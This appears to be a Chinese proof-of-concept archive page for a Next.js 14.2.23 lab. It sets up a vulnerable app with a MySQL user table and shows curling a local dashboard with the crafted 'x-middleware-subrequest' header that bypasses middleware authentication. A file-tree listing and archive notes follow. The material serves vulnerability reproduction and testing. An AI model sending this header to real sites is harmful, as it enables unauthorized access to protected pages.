关联漏洞
介绍
```sh
npx create-next-app@14.2.23
```
### Install packages
```sh
npm install -D @types/bcrypt
npm install mysql2
npm install jose
npm install -D @types/jsonwebtoken
```
### Prepare DB
``` SQL
CREATE TABLE users (
id INT PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(255) UNIQUE NOT NULL,
password VARCHAR(255) NOT NULL
);
```
### Run
```bash
npm run dev
```
###
```sh
# Register some users for test.
curl http://localhost:3000/api/register
# Curl dashboard with or without the header:
# "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
curl http://localhost:3000/dashboard
```
文件快照
[4.0K] /data/pocs/1dce6e7b622f9faef192e690ae6e082c54dee672
├── [4.0K] app
│ ├── [4.0K] api
│ │ ├── [4.0K] login
│ │ │ └── [1.2K] route.ts
│ │ └── [4.0K] register
│ │ └── [ 781] route.ts
│ ├── [4.0K] dashboard
│ │ └── [ 925] page.tsx
│ ├── [ 25K] favicon.ico
│ ├── [4.0K] fonts
│ │ ├── [ 66K] GeistMonoVF.woff
│ │ └── [ 65K] GeistVF.woff
│ ├── [ 413] globals.css
│ ├── [ 742] layout.tsx
│ ├── [4.0K] login
│ │ └── [2.4K] page.tsx
│ └── [3.9K] page.tsx
├── [4.0K] lib
│ └── [ 301] db.ts
├── [1.1K] middleware.ts
├── [ 92] next.config.mjs
├── [ 686] package.json
├── [225K] package-lock.json
├── [ 135] postcss.config.mjs
├── [ 631] README.md
├── [ 395] tailwind.config.ts
├── [ 574] tsconfig.json
└── [4.0K] utils
└── [ 378] jwtverification.ts
9 directories, 20 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。